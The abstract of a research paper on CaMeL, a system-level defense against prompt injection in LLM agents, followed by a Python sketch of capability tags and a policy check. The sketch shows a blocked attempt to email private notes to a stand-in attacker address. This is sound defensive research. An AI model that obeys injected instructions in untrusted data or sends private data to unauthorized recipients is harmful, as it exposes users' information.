Defeating Prompt Injections by Design (2503.18813v2)
Abstract: LLMs are increasingly deployed in agentic systems that interact with an untrusted environment. However, LLM agents are vulnerable to prompt injection attacks when handling untrusted data. In this paper, we propose CaMeL, a robust defense that creates a protective system layer around the LLM, securing it even when the underlying models are susceptible to attacks. To operate, CaMeL explicitly extracts the control and data flows from the (trusted) query; therefore, untrusted data retrieved by the LLM can never impact the program flow. To further improve security, CaMeL relies on a notion of capabilities to prevent the exfiltration of private data over unauthorized data flows, enforcing security policies when tools are called. We demonstrate the effectiveness of CaMeL by solving $77\%$ of tasks in AgentDojo with provable security (compared to $84\%$ solved by an undefended system). We release CaMeL at https://github.com/google-research/camel-prompt-injection.
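
To make the abstract's capability idea concrete, here is a minimal Python sketch, not the CaMeL implementation, of tagging values with capability metadata (provenance and allowed readers) and enforcing a security policy before a tool call. All names (`Tagged`, `Capability`, `send_email`, the example addresses and sources) are hypothetical and chosen for illustration; the actual system's interpreter, policies, and metadata are described in the paper and repository.

```python
# Minimal sketch (assumptions, not the CaMeL API): values carry capability
# metadata, and a policy check runs before each tool call.
from dataclasses import dataclass


@dataclass(frozen=True)
class Capability:
    """Records where a value came from and which principals may read it."""
    sources: frozenset   # e.g. {"user_query"} or {"drive:notes.txt"}
    readers: frozenset   # principals allowed to receive this value


@dataclass
class Tagged:
    """A value together with its capability metadata."""
    value: object
    cap: Capability


def send_email_policy(recipient: Tagged, body: Tagged) -> None:
    """Security policy: the recipient must be an authorized reader of the body."""
    if recipient.value not in body.cap.readers:
        raise PermissionError(
            f"Blocked: {recipient.value!r} is not an authorized reader of the body"
        )


def send_email(recipient: Tagged, body: Tagged) -> None:
    send_email_policy(recipient, body)  # policy is enforced before the tool runs
    print(f"Sending to {recipient.value}: {body.value}")


# The (trusted) user query fixes the control flow: email Bob the meeting notes.
bob = Tagged("bob@example.com",
             Capability(frozenset({"user_query"}), frozenset({"bob@example.com"})))

# Untrusted retrieved data is tagged with its source and allowed readers; an
# injected instruction inside it cannot alter which tools get called, and the
# capability limits where the data may flow.
notes = Tagged("Meeting at 3pm.",
               Capability(frozenset({"drive:notes.txt"}), frozenset({"bob@example.com"})))

send_email(bob, notes)  # allowed: Bob may read the notes

attacker = Tagged("eve@evil.example",
                  Capability(frozenset({"user_query"}), frozenset({"eve@evil.example"})))
try:
    send_email(attacker, notes)  # unauthorized data flow
except PermissionError as err:
    print(err)  # exfiltration attempt is blocked by the policy
```

The key design point mirrored here is that the policy check depends only on metadata attached to values, so blocking an unauthorized flow does not require the LLM itself to resist the injected instructions.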